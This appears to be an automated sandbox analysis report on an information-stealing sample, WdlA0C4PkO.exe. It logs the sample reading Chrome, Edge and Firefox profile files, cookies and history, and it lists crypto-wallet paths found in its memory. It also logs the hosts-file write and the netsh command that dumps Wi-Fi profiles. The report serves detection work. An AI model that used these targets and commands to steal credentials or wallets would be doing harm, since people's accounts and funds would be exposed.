                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\TrustTokenKeyCommitments VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Web Notifications Deny List VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\WorkspacesNavigationComponent VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ZxcvbnData VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\hyphen-data VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\GraphiteDawnCache VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Local\Temp\games-Public VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Local\Temp\games-Public\Public\Epic Games VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\OnDeviceHeadSuggestModel VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\OriginTrials VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Local\Temp\games-user\user\Epic Games VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Local\Temp\games-user\user\Minecraft VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: \Device\CdRom0\ VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\ThirdPartyModuleList64 VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\WidevineCdm VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\ZxcvbnData VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\hyphen-data VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\pnacl VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\segmentation_platform VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ca4gppea.default VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Local\Temp\browsers-temp\user\Chrome VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Local\Temp\browsers-temp\user\Firefox\3nxxd8pi.default-release VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Local\Temp\browsers-temp VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Local\Temp\browsers-temp\user VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Local\Temp\browsers-temp\user\Chrome VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Local\Temp\browsers-temp\user\Chrome\Default VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Local\Temp\browsers-temp\user\Firefox VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Local\Temp\browsers-temp\user\Firefox\3nxxd8pi.default-release VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Local\Temp\browsers-temp\user\Chrome VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Local\Temp\browsers-temp\user\Firefox VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Local\Temp\browsers-temp\user\Firefox\3nxxd8pi.default-release VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\crashes VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\crashes\events VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\archived VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\archived\2023-10 VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\glean VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\glean\events VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\glean\pending_pings VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\glean\tmp VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\saved-telemetry-pings VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\security_state VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\sessionstore-backups VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\default VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\2918063365piupsah.files VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\temporary VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\to-be-removed VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ca4gppea.default VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: \Device\CdRom0\ VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Local\Temp\PEHPVXinsv VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Lowering of HIPS / PFW / Operating System Security Settings

                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File written: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles

                      Stealing of Sensitive Information

                      Source: Yara match | File source: 22.2.SecurityHealthSystray.exe.280000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 13.2.SecurityHealthSystray.exe.280000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0000000D.00000002.1508066041.0000000000281000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000016.00000002.1590941085.0000000000281000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: SecurityHealthSystray.exe PID: 7388, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: SecurityHealthSystray.exe PID: 3348, type: MEMORYSTR
                      Source: WdlA0C4PkO.exe, 00000000.00000003.1440916143.000001A60DE30000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: \??\C:\Users\Public\AppData\Roaming\Electrum\walletsData
                      Source: SecurityHealthSystray.exe, 0000000D.00000002.1508066041.0000000000281000.00000040.00000001.01000000.00000007.sdmp | String found in binary or memory: - `` - Jaxx%s%sCoreEverMathNamiTrontruefilereadopensyncpipelinkStatquitbindidle.com.exe.bat.cmdUUIDPOSTtext asn1nullbooljson'\''Host<>http1080DATAPINGEtag0x%xdateetagfromhostvaryDategzip%x
                      Source: WdlA0C4PkO.exe, 00000000.00000003.1440916143.000001A60DE30000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: \??\C:\Users\Public\AppData\Roaming\Exodus\exodus.wallet
                      Source: WdlA0C4PkO.exe, 00000000.00000003.1440916143.000001A60DE30000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: \??\C:\Users\Default\AppData\Roaming\Ethereum\keystore
                      Source: WdlA0C4PkO.exe, 00000000.00000003.1440916143.000001A60DE30000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: \??\C:\Users\Default\AppData\Roaming\Coinomi\Coinomi\walletseldb
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\sessionstore-backups
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-wal
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqlite
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqlite-wal
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\permissions.sqlite
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage.sqlite
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files
